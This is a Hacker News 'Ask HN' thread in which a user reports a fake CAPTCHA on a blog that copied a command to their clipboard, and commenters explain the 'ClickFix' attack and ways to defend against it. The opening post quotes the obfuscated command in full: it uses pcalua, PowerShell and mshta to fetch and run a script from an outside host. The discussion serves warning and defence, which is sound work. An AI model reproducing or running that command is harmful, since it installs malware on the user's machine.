| ▲ | Ask HN: Crooked Timber showed showed me a virus captcha, What now? | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| 38 points by Jgoauh 4 hours ago | 43 comments | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Hello everyone, This morning, as i started my shift, i thought i would start visiting some news blogs / websites to kick off the day. When it got to Crooked Timber i saw a captcha page instead, it looked like a traditional Google captcha. I clicked it, the spinner spun, and a box opened on the right, showing the traditional "Verify you're human" white title on a blue background. It showed 2 "Manual Verification Steps" : 1. Press Win + R 2. Press Ctrl + V and press Run At first i assumed it was a new type of captcha checking i a physical keyboard was attached to the browser. But i instantly recognized the attempt to make me run a script on my machine. I opened a new type and to my surprise, the something new was in my clipboard : "pcalua -a "PowerShell" -c "saps cmd '/v/c m^s^h^t^a h^t^t^p^s^:^/^/fine-work-team.com/6272' -Wi Hi"" I submited it to one of LLMs my work gives me access to, which told me to absolutly not run it (i wasn't planning to) and explained the command would download and run a script from the URL. How do i protect myself from these scams / hack attempts in the future ? i always tought of myself "prepared" but i was surprised. Has this happened to you before ? How do you protect yourself ? | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| ▲ | everdrive 4 hours ago | parent | next [-] | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
This is called a "ClickFix" attack. There is really _never_ a time when a CAPTCHA will require you to execute code on your machine. The attack is basically getting someone to accidentally run malicious code. - ctrl + R brings up the Windows "run" dialogue. - the code executes a powershell command that reaches out to a remote server - if successful, the remote server answers and you have installed a dropper or something. Really, you should never do _anything_ like this for any website. You don't need to protect yourself. This is sort of equivalent (in the strict metaphorical sense) of getting a call from your bank and they ask you for your banking password: you just never do it, no matter what. Same thing here. You don't ever execute code via the run dialogue to solve a CAPTHCA. Never. https://www.sentinelone.com/blog/how-clickfix-is-weaponizing... | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| ▲ | kstrauser 3 hours ago | parent | prev | next [-] | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Not directly answering your questions, but I just wanted to say: Great instincts! You saw something unusual, then 1. Stopped what you were doing. 2. Investigated to see if this was legitimate or malicious. 3. Identified a place to asked others about it. 4. Formulated a good question with enough background information to help people answer it. All around good job! Well done. | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| ▲ | Good4boothee 3 hours ago | parent | prev | next [-] | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> How do you protect yourself Was the site itself actually infected(hacked)? If not, then all you need is adblock (like ublock origin). And that was true for last 20 years. If website actually got hacked then I don't know of any good solutions. It will be flagged soon or later, and new visitors will be blocked by "Google Safe Browsing". Using something like "Qubes OS" might protect you against attacks based on browser zero-days but VMs don't really protect against ClickFix when people usually share clipboard between host and client VMs. | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| ▲ | Retr0id 3 hours ago | parent | prev | next [-] | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Google is trying to normalize a new "complete the captcha on your phone by scanning a QR code" flow, which I'm sure will be a whole new vector for scams. | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| ▲ | fallinghawks an hour ago | parent | prev | next [-] | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
I ran into the same thing on a cooking blog (which I had visited many times before) a few weeks back. I was pretty mystified but like you, spidey sense kept me from running the code. It's insidious because it looks like it's coming from Captcha. I do have uBO Lite running on Chrome. Tried the website in Firefox and also got the same manual run thing. I wasn't sure what to do about it. Obviously I was unable to notify the blog owner. I came back to the website about a week later and it didn't come up again. | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| ▲ | c0n5pir4cy 3 hours ago | parent | prev | next [-] | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Do you have any browser extensions enabled? I've seen similar before where it wasn't the page itself that injected it - rather it was injected by a compromised/sold extension that has permissions on all pages. | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| ▲ | bstsb 3 hours ago | parent | prev | next [-] | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
this is wildly complex, way more so than a traditional ClickFix attack. it's fetching JS scripts from a Ethereum/Base contract and executing them - i've never seen something like this before | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| ▲ | nneonneo 3 hours ago | parent | prev | next [-] | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
This exact technique has been around for a while; there are even government resources warning about it (e.g. https://www.michigan.gov/msp/divisions/intel-ops/cyber/mc3/c... - April 2025). As you might imagine, these attacks are aimed at less sophisticated users who may have no idea what Win+R even does, and who might be tricked into believing that this actually has anything to do with website verification. The site you visited -- or one of the resources it depends on -- might have been compromised. If you're enterprising, you could probably determine where the malicious script is getting loaded from by looking in the page source. | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| ▲ | ABoltzmannMush 4 hours ago | parent | prev | next [-] | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Reporting to https://safebrowsing.google.com/safebrowsing/report_phish/, which if their tests reproduce the problem will make most browsers unwilling to load the domain. Generally ether caused by a hacked CMS or bad advertisement. | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| ▲ | absqueued 2 hours ago | parent | prev | next [-] | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Seems like the attack is still happening.[0] | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| ▲ | joombaga 3 hours ago | parent | prev | next [-] | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
fine-work-team.com has been reported as suspicious. Cloudflare is blocking it now. | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| ▲ | SoftTalker 3 hours ago | parent | prev | next [-] | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> How do i protect myself from these scams / hack attempts in the future Endless vigilance. Scammers are always working on new tricks. You were rightly suspicious and not fooled by this one. | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| ▲ | confusedbucket 3 hours ago | parent | prev | next [-] | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> Has this happened to you before ? Almost, recently. I bought a new Mac, needed something reliable to carry around. I never had a Mac or anything from Apple before, so I wasn't familiar with how exactly does it work. I knew homebrew existed, I understood it's similar to Linux/Windows in that not all applications are in the store, but wasn't familiar at all with how those are commonly installed. Here's what I did: 1. Open Safari, the only browser there was. 2. Typed "claude mac download" in the search bar (needed Cowork). 3. Clicked the first link. 4. Copied the command it told me to, instructing me to run it in terminal. Only now I realize that there's something fishy about the command; it had base64 payload in it. Didn't run it and took closer look on the page - it was a Claude share (which I quickly scrolled over). I can admit mistakes, but Google, Apple and Anthropic deserve some blame here, too. - Google: pushed malware link up top, didn't (distinctly, at least) mark it as a paid result and I'd swear it didn't show me the URL (which I usually always check before clicking, but maybe I just missed it as the search results are rendered differently from Kagi's) - Safari: hides path by default, so all you see is "claude.ai". Someone probably thought this looked nice, I think it's just borderline idiotic. - Anthropic: hosts what's essentially a user-content on their main domain. Also recently saw a few legit projects using base64 in their install one-liners. Please, stop it. > How do you protect yourself ? Installed not Safari and made Google not my default search engine, as I always do. That way I at least always know where I am. | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| ▲ | baggachipz 4 hours ago | parent | prev | next [-] | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> showed showed | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| ▲ | nargek 2 hours ago | parent | prev | next [-] | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
> How do you protect yourself ? As a "end-user" one of the most effective way is to either disable js, which isn't the most practical thing for most of us. You can also use ublock-origin, it doesn't only block ads! You can also throw a lying-DNS in the chain, either by using something like Quad9 or a local resolver with appropriate blocklists (think of unbound or for a more user-friendly solution piehole) Also an anti-virus can help detect the usual stealer that will be dropped by these FakeCaptcha/ClickFix attack, but they are also easily bypassed, that's why you need multiple layers of protection : each of them can and will fail | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| ▲ | bschne 4 hours ago | parent | prev | next [-] | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
pinged one of the authors on bsky, let's see | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| ▲ | nicce 2 hours ago | parent | prev | next [-] | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
I have seen it before in infected WordPress instances related to recent remote RCE. Probably one victim more. | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| ▲ | sharedptr 4 hours ago | parent | prev [-] | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
It’s a typical technique, report it to safe browsing, upload it to VirusTotal, that should be tit flagged quickly | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||